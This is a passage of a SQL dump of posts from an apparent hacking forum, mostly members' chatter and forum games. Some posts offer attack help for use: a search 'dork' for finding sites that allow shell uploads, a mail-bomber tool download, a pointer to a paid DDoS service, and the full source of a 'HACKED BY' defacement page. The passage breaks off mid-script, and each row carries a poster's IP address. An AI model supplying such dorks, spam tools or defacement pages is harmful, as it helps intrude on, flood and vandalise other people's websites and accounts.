INSERT INTO mybb_posts VALUES('2493', '499', '2411', '7', 'RE: 1 Month', '0', '5', 'Timmy', '1348456069', 'Congratz on LH for a month', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '23c0eb8645f8e4ffe7d46bed2038c859', '0', '0'); INSERT INTO mybb_posts VALUES('2494', '488', '2355', '8', 'RE: What are you listening to?', '0', '5', 'Timmy', '1348456164', 'http://www.youtube.com/watch?v=dTI0KDuQl_4&feature=g-music\n\nMercy its a nice song', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0324de50d859ac13f8a1eaa88000cfe1', '0', '0'); INSERT INTO mybb_posts VALUES('2495', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '5', 'Timmy', '1348456315', 'Name: Timmy\nAge: 16\nUsername: Timmy\nProfile Link: http://l33thacking.net/user-5.html\nAre you Unique?: Yes\nAre you HQ?: Yes\nWhy do you wish to get into our group?: I want to help LH become popular and i think this is right group to be in\nWill you do to contribute to Unique?: Yes i will.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0d176c4d2cbb541c92b503c232ed795f', '0', '0'); INSERT INTO mybb_posts VALUES('2496', '380', '1746', '34', 'RE: Simple Signature Tutorial', '0', '5', 'Timmy', '1348456401', 'Your outcome was good even thouh you followed a tutorial your result was good.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '672ddae8a5f190d6e31e639fb487ae9f', '0', '0'); INSERT INTO mybb_posts VALUES('2497', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '82', 'iTzIpod', '1348456445', 'Try adding him on Skype. He is usually on. Unless he is busy.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4eb5ebd81d2a43dfc2e415ee323fe64b', '0', '0'); INSERT INTO mybb_posts VALUES('2498', '439', '2444', '58', 'RE: Unique - Recruitment', '0', '1', 't3h jok3r', '1348456489', '[quote=\'iTzIpod\' pid=\'2444\' dateline=\'1348277273\']\r\n[quote=\'t3h jok3r\' pid=\'2432\' dateline=\'1348274288\']\r\n1. Where are the group requirements?\r\n2. Where are the userbar and the ficon images?\r\n[/quote]\r\n\r\nShould I just delete the thread instead? And like remake it after? Since I am very busy these days.. -.-\r\n[/quote]\r\n\r\nDude it\'s not hard to do what I\'m asking you to do.\r\n\r\nNVM, I edited them for you.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '92b6c07adfff3efcb8fd733d005db689', '0', '0'); INSERT INTO mybb_posts VALUES('2499', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1348456501', 'tflix account\n\n\nAccidently copied and pasted that. Was selling a Netflix Account to a customer.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1fce52d66cbfdf5c47e6b11db47ef488', '0', '0'); INSERT INTO mybb_posts VALUES('2500', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1348456540', '22 is the next number.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8faebd8ab9ac8499704fadf6250130c1', '0', '0'); INSERT INTO mybb_posts VALUES('2501', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1348456617', 'My posts per day ratio is going down..\nIt was 23 before and now it\'s 18.. I\'m going inactive every hour or so. I need to boost it! :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd2c8e5f3831b3cd4515ef16bde0b7da6', '0', '0'); INSERT INTO mybb_posts VALUES('2502', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1348456650', '/me laughs at t3h jok3r for laughing at iTzIpod for being a copy cat.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1629d1a7a937b8f1859815b52c58d3f8', '0', '0'); INSERT INTO mybb_posts VALUES('2503', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1348456694', 'Banned for not being a spammer.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '867d2f04a5b9e47ea5c73ae62735ffd2', '0', '0'); INSERT INTO mybb_posts VALUES('2504', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348456743', 'Granted. But it broke again. Muahahhhaahaha.\n\nI wish I was a good GFX Designer.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '24f880b08927cd7f888b115b0a2e3269', '0', '0'); INSERT INTO mybb_posts VALUES('2505', '486', '2353', '56', 'RE: Guess how many?', '0', '82', 'iTzIpod', '1348456802', 'Rofl. I only guessed 32 :p Forgot that there were other combinations.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8c957a34436d061d334d6a21f1827c5f', '0', '0'); INSERT INTO mybb_posts VALUES('2506', '499', '2411', '7', 'RE: 1 Month', '0', '82', 'iTzIpod', '1348456861', 'Thank you Timmy. And congratulations on 100 posts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a6c303b9d3fd37747491c634b6599370', '0', '0'); INSERT INTO mybb_posts VALUES('2507', '488', '2355', '8', 'RE: What are you listening to?', '0', '82', 'iTzIpod', '1348456939', 'That song is alright. :p I personally don\'t like it. But different people = different opinion. I\'m listening to Owl City - Good Time', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ee46671c0883cbb8177e80f2c9f55183', '0', '0'); INSERT INTO mybb_posts VALUES('2508', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348457037', 'Thanks. And I fixed one of the questions. Last one didn\'t really make sense. Sorry. Fixed.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0fe6290b2572f214a5a306afc0216858', '0', '0'); INSERT INTO mybb_posts VALUES('2509', '380', '1746', '34', 'RE: Simple Signature Tutorial', '0', '82', 'iTzIpod', '1348457125', 'Not really. I didn\'t like it :p Looks too plain. And the background is terrible. I couldn\'t find the render. I wanted to make mine look just like the Sample one. But my results failed and were inaccurate :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '006d537cb950c23a1c128c12f2bc9401', '0', '0'); INSERT INTO mybb_posts VALUES('2510', '487', '2504', '56', 'RE: Corrupt a wish', '0', '2', 'Apathy', '1348457164', '[quote=\'iTzIpod\' pid=\'2504\' dateline=\'1348456743\']\r\nGranted. But it broke again. Muahahhhaahaha.\r\n\r\nI wish I was a good GFX Designer.\r\n[/quote]\r\n\r\nThen people would always want free designs. (true story happend to me) ;)\r\n\r\nI wish I could read minds.', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', '1de99838281b2be4870b3cc1f5495fe0', '0', '0'); INSERT INTO mybb_posts VALUES('2511', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348457282', 'Granted. But one day, you will receive a massive headache for all of the things you have read. \n\n\nI wish I could go to sleep right now for school tomorrow -.- (11:27 PM)\n\nI took 1 sip of coffee from a Tim Hortons cup today and now can\'t sleep..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'df77205787fd89f60ae817716afec50b', '0', '0'); INSERT INTO mybb_posts VALUES('2512', '503', '2465', '3', 'RE: Ridiculous Downtime and Awards', '0', '2', 'Apathy', '1348457287', 'Awesome about the rewards. I get to give them xD and ya it sucked that we were down.', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', 'ef070be41a59dd6f1c7c4813fe3cd74f', '0', '0'); INSERT INTO mybb_posts VALUES('2513', '380', '1746', '34', 'RE: Simple Signature Tutorial', '0', '2', 'Apathy', '1348457342', 'Lol, nice share thanks. :)', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', 'fb7da18707aa2c36d5db9b5e754befcf', '0', '0'); INSERT INTO mybb_posts VALUES('2514', '487', '2354', '56', 'RE: Corrupt a wish', '0', '2', 'Apathy', '1348457403', 'You did not wish anything?', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', 'b23be52809e8da514463504b63ee5a65', '0', '0'); INSERT INTO mybb_posts VALUES('2515', '380', '1746', '34', 'RE: Simple Signature Tutorial', '0', '82', 'iTzIpod', '1348457568', 'No problem. Enjoy! And good luck making the signature. ;) Post your outcome please.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '579a7370a8abf1c957b3363acae7e02f', '0', '0'); INSERT INTO mybb_posts VALUES('2516', '487', '2514', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348457698', '[quote=\'Apathy\' pid=\'2514\' dateline=\'1348457403\']\r\nYou did not wish anything?\r\n[/quote]\r\n\r\n[quote=\'iTzIpod\' pid=\'2511\' dateline=\'1348457282\']\r\nGranted. But one day, you will receive a massive headache for all of the things you have read. \r\n\r\n\r\n[b]I wish I could go to sleep right now for school tomorrow -.- (11:27 PM)\r\n\r\nI took 1 sip of coffee from a Tim Hortons cup today and now can\'t sleep..[/b]\r\n[/quote]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '17bd36483ff33df687c3b19fd6761833', '0', '0'); INSERT INTO mybb_posts VALUES('2517', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '1', 't3h jok3r', '1348458597', 'No problem. People learn from mistakes.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bb47b01094ab44345dff26ff60bdb895', '0', '0'); INSERT INTO mybb_posts VALUES('2518', '487', '2354', '56', 'RE: Corrupt a wish', '0', '1', 't3h jok3r', '1348459527', 'Granted but if you sleep early, you will get long nightmares.\n\nI wish I could start earning something from LH because I\'m investing a lot and earning nothing.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '898f8ecb403e0013fa9e5261d390a214', '0', '0'); INSERT INTO mybb_posts VALUES('2519', '487', '2518', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348459916', '[quote=\'t3h jok3r\' pid=\'2518\' dateline=\'1348459527\']\r\nGranted but if you sleep early, you will get long nightmares.\r\n\r\nI wish I could start earning something from LH because I\'m investing a lot and earning nothing.\r\n[/quote]\r\n\r\nGranted. You are earning 20 cents/day. \r\n\r\nI wish I could get good grades in school for a good future.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c1fdec019d4363a3d4f139dfbb8face4', '0', '0'); INSERT INTO mybb_posts VALUES('2520', '504', '0', '7', 'Almost there!', '0', '82', 'iTzIpod', '1348460343', 'L33tHacking is almost there. We almost have 2,500 posts and 500 threads! Lets try to obtain those milestones.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd5e7bcc9d9a609e6b647f0680cecb434', '0', '0'); INSERT INTO mybb_posts VALUES('2521', '504', '2520', '7', 'RE: Almost there!', '0', '1', 't3h jok3r', '1348460760', 'We sure are. Hopefully those 500 are this week.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fbae46c09a1a1c6140cb975467c507e6', '0', '0'); INSERT INTO mybb_posts VALUES('2522', '504', '2520', '7', 'RE: Almost there!', '0', '4', 'Triple H', '1348460803', 'I\'m on it. Going to post some threads today.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '86f4f87db4bad74a29097d7f9a47fc6c', '0', '0'); INSERT INTO mybb_posts VALUES('2523', '505', '0', '53', 'Complete Java Guide', '0', '4', 'Triple H', '1348460907', '[b][color=#FF0000]Official Website:[/color][/b]\r\nhttp://www.java.com/en/\r\n\r\n[color=#FF0000][u][b]What is Java?[/b][/u][/color]\r\n\r\nJava is a programming language originally developed by James Gosling at Sun Microsystems (which is now a subsidiary of Oracle Corporation) and released in 1995 as a core component of Sun Microsystems\' Java platform. The language derives much of its syntax from C and C++ but has a simpler object model and fewer low-level facilities. Java applications are typically compiled to bytecode (class file) that can run on any Java Virtual Machine (JVM) regardless of computer architecture. Java is a general-purpose, concurrent, class-based, object-oriented language that is specifically designed to have as few implementation dependencies as possible. It is intended to let application developers \"write once, run anywhere\". Java is currently one of the most popular programming languages in use, and is widely used from application software to web applications.\r\n\r\n\r\n[color=#FF0000][b]Java E-books:[/b][/color]\r\n\r\nhttp://media.techtarget.com/tss/static/b...B3rdEd.pdf\r\nhttp://www.informit.com/library/library....a2_24hours\r\nhttp://java.sun.com/docs/books/jni/\r\nhttp://java.sun.com/docs/books/jls/secon...C.doc.html\r\nhttp://java.sun.com/developer/onlineTrai...index.html\r\nhttp://www.javaa.com/100/high.zip\r\nhttp://www.brpreiss.com/books/opus5/html/book.html\r\nhttp://cs.armstrong.edu/liang/intro5e/Su...clipse.pdf\r\nhttp://www.brpreiss.com/books/opus5/html/book.html\r\nhttp://www.roxie.org/books/bleeding/tabl...tents.html\r\n\r\n[color=#FF0000][b]Useful Websites:[/b][/color]\r\nhttp://www.codeproject.com/KB/java/\r\nhttp://www.info4java.com/\r\nhttp://www.beginner-java-tutorial.com/\r\nhttp://www.javapassion.com/javaintro/\r\nhttp://java.sun.com/new2java/index.jsp\r\nhttp://www.webpelican.com/internet-programming-1/\r\nhttp://home.cogeco.ca/~ve3ll/jatutor0.htm\r\nhttp://www.cafeaulait.org/\r\nhttp://java.sun.com/developer/onlineTraining/JavaIntro/\r\nhttp://java.sun.com/developer/onlineTrai...index.html\r\nhttp://java.sun.com/developer/onlineTrai...asicJava2/\r\nhttp://www.extropia.com/tutorials/java/toc.html\r\nhttp://java.sun.com/docs/books/tutorial/\r\nhttp://www.cafeaulait.org/javatutorial.html\r\nhttp://www.javacoffeebreak.com/tutorials/index.html\r\nhttp://www.cs.cmu.edu/~jch/java/optimization.html\r\nhttp://www.apl.jhu.edu/~hall/java/Swing-...nting.html\r\nhttp://www.javacoffeebreak.com/java101/java101.html\r\nhttp://java.sun.com/developer/technicalA.../1.4regex/\r\nhttp://www.mandomartis.com/onlinecourses/courses.html\r\nhttp://java.sun.com/developer/onlineTrai...index.html\r\nhttp://www.cs.drexel.edu/~shartley/ConcP...index.html\r\nhttp://www.artima.com/designtechniques/i...ation.html\r\nhttp://www.apl.jhu.edu/~hall/java/Java2D-Tutorial.html\r\nhttp://java.sun.com/developer/onlineTrai...tract.html\r\nhttp://www.javaworld.com/javaworld/jw-12...ckets.html\r\nhttp://www.acm.org/crossroads/xrds4-2/serial.html\r\nhttp://java.sun.com/developer/onlineTrai...g/JDCBook/\r\nhttp://www.apl.jhu.edu/~hall/java/CGI-with-Java.html\r\nhttp://www.vijaymukhi.com/vmis/java.html\r\nhttp://java.sun.com/docs/books/tutorial/deployment/jar/\r\nhttp://www.woodger.ca/jv_top.htm\r\nhttp://www.webdeveloper.com/java/java_pr...ds_up.html\r\nhttp://javaboutique.internet.com/\r\nhttp://java.sun.com/developer/onlineTrai...index.html\r\nhttp://www.codeproject.com/KB/java/\r\nhttp://www.info4java.com/\r\nhttp://www.beginner-java-tutorial.com/\r\nhttp://www.javapassion.com/javaintro/\r\nhttp://java.sun.com/new2java/index.jsp\r\nhttp://www.webpelican.com/internet-programming-1/\r\nhttp://home.cogeco.ca/~ve3ll/jatutor0.htm\r\nhttp://www.cafeaulait.org/\r\nhttp://java.sun.com/developer/onlineTraining/rmi/\r\nhttp://www.onjava.com/pub/a/onjava/excer...index.html\r\nhttp://netbeans.org/kb/articles/learn-java.html\r\nhttp://java.sun.com/docs/books/tutorial/java/index.html\r\nhttp://www.freejavaguide.com/\r\n\r\nCredit to YourMomIsFat', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7e1e4dbd0cb1f664021c52c1b0771d49', '0', '0'); INSERT INTO mybb_posts VALUES('2524', '504', '2520', '7', 'RE: Almost there!', '0', '82', 'iTzIpod', '1348460965', 'Going to post some threads later on today.. Not now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b5a40e1a90e649b80992356ed23c1566', '0', '0'); INSERT INTO mybb_posts VALUES('2525', '506', '0', '18', '[NEW]T3RMIN8OR\'S B0MB3R[NEW]', '0', '4', 'Triple H', '1348461205', '[u][color=#32CD32]Features:[/color][/u]\r\n[spoiler]+You can send mails from Gmail.\r\n+You can send mails from Hotmail.\r\n+It\'s reliable & quite fast.\r\n+Easy to use (Noob friendly).[/spoiler]\r\n\r\n[u][color=#32CD32]Screenshot\'s[/color]:[/u]\r\n[spoiler][URL=http://imageshack.us/photo/my-images/829/tab1l.png/][IMG]http://img829.imageshack.us/img829/7425/tab1l.png[/IMG][/URL]\r\n\r\n[URL=http://imageshack.us/photo/my-images/268/tab2o.png/][IMG]http://img268.imageshack.us/img268/2903/tab2o.png[/IMG][/URL]\r\n\r\n[URL=http://imageshack.us/photo/my-images/716/tab3s.png/][IMG]http://img716.imageshack.us/img716/6475/tab3s.png[/IMG][/URL]\r\n\r\nUploaded with [URL=http://imageshack.us]ImageShack.us[/URL][/spoiler]\r\n\r\n[u][color=#32CD32]Virus scan [color=#FF6347]2[/color]/[color=#32CD32]42[/color][/color]:[/u]\r\n[spoiler][url=http://www.virustotal.com/file-scan/report.html?id=c0358cb58c2118de60e24b911172bebbf90e6a163715d10af1a51176c61d50fd-1308498289]Virus Total[/url]\r\n\r\n[url=http://vscan.novirusthanks.org/analysis/d5cffa744359a7a9e69ae73533649c1d/bmV3LXN1cGVyLWJvbWJlci1leGU=/]No Virus Thanks[/url]\r\n\r\nWell I don\'t know why but all my VB projects are detected as these following ones that are found. Weird?[/spoiler]\r\n\r\n[u][color=#32CD32]The Download File[/color]:[/u]\r\n[spoiler][url=http://adf.ly/1uHfj]Mediafire[/url][/spoiler]\r\n\r\n\r\nPlease appreciate my work, even thou its not the best spammer/bomber, If people like it, it will actually encourage me\r\nto do more things on VB and then share it with Ubers. Also if more people comment appreciating my work.\r\n\r\n[u][color=#32CD32]More updates might come up[/color]:[/u]\r\n[spoiler]+Add Attachments to mails.\r\n+Tell how many mails you want to send.\r\n+A progress bar.\r\n+Send anonymous mails (Possibly)[/spoiler]\r\n\r\nHope you guys like it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ecca087e1fd625221b9a863fe77c8b90', '0', '0'); INSERT INTO mybb_posts VALUES('2526', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '4', 'Triple H', '1348461403', 'They aren\'t bad but look old school.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8b46ed6c010dfb9b68c6e8907ee46b33', '0', '0'); INSERT INTO mybb_posts VALUES('2527', '507', '0', '13', 'New dork on vulnerabilities and view files', '0', '4', 'Triple H', '1348461744', 'Any websites url ending with the dork below will allow you to upload your shell and some sites will allow you to view their FTP files.\r\n\r\n[b]Dork[/b]\r\n\r\n[quote]\r\nmain/upload\r\n[/quote]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '18950d118391e972ae8b22f3c9d249a1', '0', '0'); INSERT INTO mybb_posts VALUES('2528', '504', '2520', '7', 'RE: Almost there!', '0', '4', 'Triple H', '1348463915', 'I\'m sure jok3r is happy L0L, it has been a long journey from 0 stats to 2K posts and 500 threads.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ead3cb63c76a4fb5d0077d976a77edad', '0', '0'); INSERT INTO mybb_posts VALUES('2529', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348473570', 'It\'s alright, i will do a few userbars when I got the time.\nI\'m currently busy with my job and my girlfriend is taking all my free time but once I\'m free I will work on it.\nAny color you would like? Or you just want to see what looks best? also should I go back with the old icon, i\'m really out of ideas because you never like my fonts xD', '46.189.247.20', '784201492', '1', '0', '62', '1348492808', '1', 'ffd99946b17057f84a173147b790bc11', '0', '1348492808'); INSERT INTO mybb_posts VALUES('2530', '503', '2512', '3', 'RE: Ridiculous Downtime and Awards', '0', '61', 'NXK', '1348496037', '[quote=\'Apathy\' pid=\'2512\' dateline=\'1348457287\']\r\nAwesome about the rewards. I get to give them xD and ya it sucked that we were down.\r\n[/quote]\r\n\r\nCan you atleast attempt to use proper grammer?\r\n\r\nYou\'re an admin, I\'m not trying to be rude but people aren\'t going to take us seriously if you\'re posting so LQ. I\'ve noticed this multiple times.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '301a509452544a2db242e0b9df38fbe9', '0', '0'); INSERT INTO mybb_posts VALUES('2533', '474', '2287', '25', 'RE: What antivirus you have?', '0', '61', 'NXK', '1348498123', 'I use my brain and online scanners.\r\n\r\nI barley ever download any .exe anyways. It\'s really easy to see a virus since 90% of people spreading make it blatent that it\'s a virus.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '0dcf5ade7133e705a5a1062f17e07252', '0', '0'); INSERT INTO mybb_posts VALUES('2534', '190', '665', '56', 'RE: Copy and paste game', '0', '61', 'NXK', '1348498444', 'Global warming is a result of increasing temperature of earth\'s atmosphere due to several factors that can be natural or man made. Whatever may be the factors the effect of global warming is not in favour of mankind and hence need to be controlled.\r\n\r\nThe main reason behind global warming is the increase in the concentration of greenhouse gases in the atmosphere due to green house effect. Green house effect leads to increase in the temperature of earth by trapping the sun\'s heat and light in the earth\'s atmosphere. In this phenomenon the heat and light of sun enters the atmosphere but cannot go out as they are trapped in earth\'s atmosphere by the green house gases and thus resulting in temperature rise. The green house gases like carbon dioxide, methane, and nitrous oxide plays the major role in green house effect and excessive emission of these gases through various means is a major cause of global warming.\r\n\r\nAnother important reason for global warming is large amounts of carbon dioxide produced from burning of fossil fuels for the different purposes especially for power generation in various power plants. Due to burning of large amount of coal in power plant excessive amount of carbon dioxide is emitted in different forms in the atmosphere. In addition to that, countless number of vehicles running in the road today is one of the major source of emission of a large amount of carbon dioxide in the atmosphere leading to increase in the temperature of earth\'s atmosphere.\r\n\r\nMethane is another green house gas that results in global warming to a large extent. Methane can be easily obtained from rice paddies, bovine flatulence, bacteria in bogs and fossil fuel manufacture and hence easily available in abundance. Moreover, it is 20 times as effective as Carbon dioxide at entrapping heat in the atmosphere and is a leading cause of global warming. Similarly, another green house gas called nitrous oxide and chlorofluorocarbons or CFCs is also responsible for the global warming. Nitrous oxide has 300 times more capacity of trapping heat than carbon dioxide while chlorofluorocarbons have heat-trapping potential thousands of times greater than carbon dioxide.\r\n\r\nAnother major cause of global warming is continuous cutting of a large number of trees across the world that is also referred as deforestation. It is projected that, 34 million acres of trees are cut and burned each ear resulting in 25% of all carbon dioxide release entering the atmosphere.\r\n\r\nIncreasing population is another cause of global warming that cannot be neglected. As human being is known to exhale carbon dioxide means more population will lead to more emission of carbon dioxide in the atmosphere resulting in increase in the level of carbon dioxide in the atmosphere and thus resulting in global warming.\r\n\r\n\r\n\r\n\r\n\r\nHuge copy and paste from a project.. I promise I wasn\'t copy/pasting assignments!', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', 'f7d4f4b7f8b875db71789c1b1aab87a1', '0', '0'); INSERT INTO mybb_posts VALUES('2535', '474', '2533', '25', 'RE: What antivirus you have?', '0', '1', 't3h jok3r', '1348507189', '[quote=\'NXK\' pid=\'2533\' dateline=\'1348498123\']\r\nI use my brain and online scanners.\r\n\r\nI barley ever download any .exe anyways. It\'s really easy to see a virus since 90% of people spreading make it blatent that it\'s a virus.\r\n[/quote]\r\nLOL I agree plus I use sandboxie which helps even more. I make sure I upload all the files on virustotal because if they aren\'t viruses and aren\'t crypted then there wouldn\'t be problem if uploaded on virustotal.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '09b75f32a99d0ddeb5e3194687ff0b1c', '0', '0'); INSERT INTO mybb_posts VALUES('2537', '503', '2465', '3', 'RE: Ridiculous Downtime and Awards', '0', '1', 't3h jok3r', '1348516032', 'Damn I didn\'t know that the myawards plugin was that famous. I will try my best.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1ba3c378bb3a46be8de1e88c8a42fbd7', '0', '0'); INSERT INTO mybb_posts VALUES('2538', '508', '0', '13', 'Awesome deface page source + PSD', '0', '8', 'spacefish36', '1348516579', 'First I will give you the PSD for the FBI Logo\nhttp://www.mediafire.com/?p86a6e7pjadthag\n\nAnd now for the page source :)\n\n[code]\n\n<html>\n <head>\n <title>HACKED - By Boss</title>\n </head><span style=\"cursor: url(\'http://cur.cursors-4u.net/cursors/images10/cur938.gif\')\">\n <body bgcolor=\"000000\">\n<center>\n\n\n\n\n<iframe width=\"1\" height=\"1\" src=\"http://youtube.googleapis.com/v/m8p_A5KrwGc&autoplay=1\" frameborder=\"0\" allowfullscreen></iframe>\n\n<p><font color=\"red\" face=\"calibri\">\n<img src=\"http://cdn1.iconfinder.com/data/icons/Iconshock_vista_hallowen/256/head.png\" width=\"37\" height=\"37\"><marquee width=\"300\"><strong>DONT BE MAD BRO! WE EAT SKIDS FOR BREAKFAST!</strong></marquee> <img src=\"http://cdn1.iconfinder.com/data/icons/Iconshock_vista_hallowen/256/head.png\" width=\"37\" height=\"37\">\n</p>\n<p>\n<b>\n<font size=\"7\" face=\"calibri\">\n<script>\n\n// make changes here!\n\nvar text=\"HACKED BY BOSS\"\nvar speed=7\n\n// Do Not Alter Code Below\nif (document.all||document.getElementById){\ndocument.write(\'<span id=\"highlight\">\' + text + \'</span>\')\nvar storetext=document.getElementById? document.getElementById(\"highlight\") : document.all.highlight\n}\nelse\ndocument.write(text)\nvar hex=new Array(\"00\",\"14\",\"28\",\"3C\",\"50\",\"64\",\"78\",\"8C\",\"A0\",\"B4\",\"C8\",\"DC\",\"F0\")\nvar r=1\nvar g=1\nvar b=1\nvar seq=1\nfunction changetext(){\nrainbow=\"#\"+hex[r]+hex[g]+hex[b]\nstoretext.style.color=rainbow\n}\nfunction change(){\nif (seq==6){\nb--\nif (b==0)\nseq=1\n}\nif (seq==5){\nr++\nif (r==12)\nseq=6\n}\nif (seq==4){\ng--\nif (g==0)\nseq=5\n}\nif (seq==3){\nb++\nif (b==12)\nseq=4\n}\nif (seq==2){\nr--\nif (r==0)\nseq=3\n}\nif (seq==1){\ng++\nif (g==12)\nseq=2\n}\nchangetext()\n}\nfunction starteffect(){\nif (document.all||document.getElementById)\nflash=setInterval(\"change()\",speed)\n}\nstarteffect()\n</script>\n</font></b>\n</p>\n<p>\n<img src=\"http://i50.tinypic.com/2ik60jn.jpg\" width=\"220\" height=\"200\">\n\n\n<!--\n ARE YOU MAD BRO?\n YOU SEEM MAD LOL\n I CAN SEE YOU!\n YOUR SO CUTE!\n-->\n\n\n\n<p>\n<font color=\"red\" face=\"calibri\">\n[] DEFACED BY Boss (credit to: GMPRO) []\n</p>\n<p>\n[] EMAIL: blunt@live.com []\n</p>\n<p>\n[] BACKUPS DELETED! []\n</p>\n<p>\n[] ADMINS ALL HACKED []\n</p>\n<p>\n[] SECURE YOUR SHIT NEXT TIME! []\n</p>\n\n<script type=\'text/javascript\'>\n// <![CDATA[\nfunction initCursor() {\nif (document.getElementById) {\nvar i, rats, rlef, rdow;\nfor (var i=0; i<sparkles; i++) {\nvar rats=createDiv(3, 3);\nrats.style.visibility=\"hidden\";\ndocument.body.appendChild(tiny[i]=rats);\nstarv[i]=0;\ntinyv[i]=0;\nvar rats=createDiv(5, 5);\nrats.style.backgroundColor=\"transparent\";\nrats.style.visibility=\"hidden\";\nvar rlef=createDiv(1, 5);\nvar rdow=createDiv(5, 1);\nrats.appendChild(rlef);\nrats.appendChild(rdow);\nrlef.style.top=\"2px\";\nrlef.style.left=\"0px\";\nrdow.style.top=\"0px\";\nrdow.style.left=\"2px\";\ndocument.body.appendChild(star[i]=rats);\n}\nset_width();\nsparkle();\n}}\nvar hex=new Array(\"00\",\"14\",\"28\",\"3C\",\"50\",\"64\",\"78\",\"8C\",\"A0\",\"B4\",\"C8\",\"DC\",\"F0\")\nvar r=1\nvar g=1\nvar b=1\nvar seq=1\nvar sparkles = 35;\nvar x=ox=400;\nvar y=oy=300;\nvar swide=800;\nvar shigh=600;\nvar sleft=sdown=0;\nvar tiny=new Array();\nvar star=new Array();\nvar starv=new Array();\nvar starx=new Array();\nvar stary=new Array();\nvar tinyx=new Array();\nvar tinyy=new Array();\nvar tinyv=new Array();\nfunction sparkle() {\nvar c;\nif (x!=ox || y!=oy) {\nox=x;\noy=y;\nfor (c=0; c<sparkles; c++) if (!starv[c]) {\nstar[c].style.left=(starx[c]=x)+\"px\";\nstar[c].style.top=(stary[c]=y)+\"px\";\nstar[c].style.clip=\"rect(0px, 5px, 5px, 0px)\";\nstar[c].style.visibility=\"visible\";\nstarv[c]=50;\nbreak;\n}\n}\nfor (c=0; c<sparkles; c++) {\nif (starv[c]) update_star(c);\nif (tinyv[c]) update_tiny(c);\n}\nsetTimeout(\"sparkle()\", 40);\n}\nfunction update_star(i) {\nif (--starv[i]==25) star[i].style.clip=\"rect(1px, 4px, 4px, 1px)\";\nif (starv[i]) {\nstary[i]+=1+Math.random()*3;\nif (stary[i]<shigh+sdown) {\nstar[i].style.top=stary[i]+\"px\";\nstarx[i]+=(i%5-2)/5;\nstar[i].style.left=starx[i]+\"px\";\n}\nelse {\nstar[i].style.visibility=\"hidden\";\nstarv[i]=0;\nreturn;\n}\n}\nelse {\ntinyv[i]=50;\ntiny[i].style.top=(tinyy[i]=stary[i])+\"px\";\ntiny[i].style.left=(tinyx[i]=starx[i])+\"px\";\ntiny[i].style.width=\"2px\";\ntiny[i].style.height=\"2px\";\nstar[i].style.visibility=\"hidden\";\ntiny[i].style.visibility=\"visible\"\n}\n}\nfunction update_tiny(i) {\nif (--tinyv[i]==25) {\ntiny[i].style.width=\"1px\";\ntiny[i].style.height=\"1px\";\n}\nif (tinyv[i]) {\ntinyy[i]+=1+Math.random()*3;\nif (tinyy[i]<shigh+sdown) {\ntiny[i].style.top=tinyy[i]+\"px\";\ntinyx[i]+=(i%5-2)/5;\ntiny[i].style.left=tinyx[i]+\"px\";\n}\nelse {\ntiny[i].style.visibility=\"hidden\";\ntinyv[i]=0;\nreturn;\n}\n}\nelse tiny[i].style.visibility=\"hidden\";\n}\ndocument.onmousemove=mouse;\nfunction mouse(e) {\nset_scroll();\ny=(e)?e.pageY:event.y+sdown;\nx=(e)?e.pageX:event.x+sleft;\n}\nfunction set_scroll() {\nif 